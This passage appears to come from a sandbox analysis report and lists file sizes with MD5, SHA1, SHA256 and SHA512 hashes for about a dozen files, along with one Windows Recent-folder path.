SHA512: de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Filesize: 16B
MD5: 46295cac801e5d4857d09837238a6394
SHA1: 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256: 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512: 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Filesize: 9KB
MD5: 89dcb690533d870d2e8444505f4c0c65
SHA1: ffe83b90d78c77c3c70033b937a8517206eab300
SHA256: 0bf999ab2bf31519209a2a9ffd9996b4f8bfa10dc9c537dfddb3a7fe8defe19e
SHA512: 3ae16eea107ed1d85340deb534a421f6ac3b7cf9f1e9d2274b2a6cdba4d69e4ce84d063a44213c73ca6fd98f432a40262ec0c8fd9421bef7b8bf9b1514266eea

Filesize: 12KB
MD5: fed6f4ba32282dd8f5f6835fe20ce41b
SHA1: fc9194949162ce94c66a784c9f6ec27bc4dc8dbf
SHA256: c95632a92b920c056306a892efad84f79212a23d8c2ed87da3ce77cf0ede1d10
SHA512: 38d624a82dad8fabeab3dc775c66570045ed031187ba39469f369c8c12df7a917f4611b9cccfc0eea480edaf98ce592c73b074ac13169b385fa984b9ed0ed4d2

Filesize: 12KB
MD5: 4f458177024f388f695d57d15b2059c3
SHA1: fe39967deda52ed74fd9423b2564a8b54ad31bcb
SHA256: 4592bd05036984356b64d03282089744b2c32a4a4c980cf3863713d0c6636d52
SHA512: f680e7186da3e15e34921849c2660c0394a15ee68782806538176cb9779807dad126c6c0e07f5a2267e6f0894c81860c3836e51b7318a151c1b38890d53508d5

Filesize: 13KB
MD5: 7fe5a91d085fe9b4fb45ed0f898bdc44
SHA1: 6544c2f391f62ac08edb7e81c263ba87328b3cf5
SHA256: 2dfc911647c637c3d26ada61f81a9d3ac419dd5c32eabdcfa8a64993ab51ac55
SHA512: 42192aaf85f98465a3ed813790e1e552efd3e45bb93aa21b7cb3b238b764365e8d6ec0cbdda1d1319ad2ddeffaebce4fb217dd5fc6b553c1bc3488446cfbb817

Filesize: 11KB
MD5: e329c0e6f1ea6f96705ee99b13cbf328
SHA1: 17c8f9aeb8686cc1bbad9d37945af505973793ae
SHA256: 8cac44a45face27d1aac5555531a32e284302ae7afafa44ebd219ba012baa3c8
SHA512: b45c3499618be827737e0671625e1b301399ed787168e3fcecd061d64332bce65b4d9b3d0b036c476f44fa80d557804f1d2905a300a081e01b2e5023773922ea

Filesize: 147B
MD5: e04e55d2e6cc3d920631fdc5d6dcc1ce
SHA1: 2c4dbcff71f8678623a7c197440ec281804dc5a5
SHA256: f641a99ec7e549970c81d724766f2a60ff031a5ec92aa6fc84228c82eeb4b4eb
SHA512: 9511fe4dc599187f4539b8cda476550c54e86cbfcaca339a5db12e980ec322bf488d7458bf76089aa1d845f164f7ddb8adea017923d9a4930b9e821b7a4ae998

Filesize: 2KB
MD5: e16e049cd254a45e3a5538de04345df1
SHA1: 120c2ac523b19ba50d7c7e11cf8630ee0b37f104
SHA256: 7fc7521be2484846088e013b233f34605c526e3a69bc5d026dba76aecbe78973
SHA512: 0a71e1e43991b055d564fad52f2cef81ec2ec592a6bf0d46311e51b80550b67ae4a495a5a76a19284bc3564559f6e7c03b9af4f887f12433d6c779f779d2a612

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize: 3KB
MD5: 2a07bee0a8267a035ceb9d6aa9474546
SHA1: 99ecf749114de8619be3000ab67684b326a903c6
SHA256: ca991473ca704c35a3fd5d6dc2a6c096e56141a399acc5a101706816b7394497
SHA512: 5349ccbbbe0dd2d9832d88d81cf55dc24f5bdc540a52086de3b8d9b2e4238c60e73db1a5906b3baf64db4e133920736d84ddd8db91005dae0d3ef0a700dae9df

Filesize: 48KB
MD5: 621315296210ef581a7467c76569dd2a
SHA1: 4ff3c6cca7986d0736f7f63ba75ea4aa0ff80a0d
SHA256: e68bbf2e440690844e6faa867b136a336cacaf855c11047b0cf91050ea7d1229
SHA512: 1064e1a7cb7cec7b76e63d788c791ac534fe3cabcae941fa87f5a924453e5a13d07219a247f1794f27bace532f2359cdd42746a95580b7fe82b1fa23b89b9ddc

Filesize: 48KB
MD5: 621315296210ef581a7467c76569dd2a
SHA1: 4ff3c6cca7986d0736f7f63ba75ea4aa0ff80a0d
SHA256: e68bbf2e440690844e6faa867b136a336cacaf855c11047b0cf91050ea7d1229
SHA512: 1064e1a7cb7cec7b76e63d788c791ac534fe3cabcae941fa87f5a924453e5a13d07219a247f1794f27bace532f2359cdd42746a95580b7fe82b1fa23b89b9ddc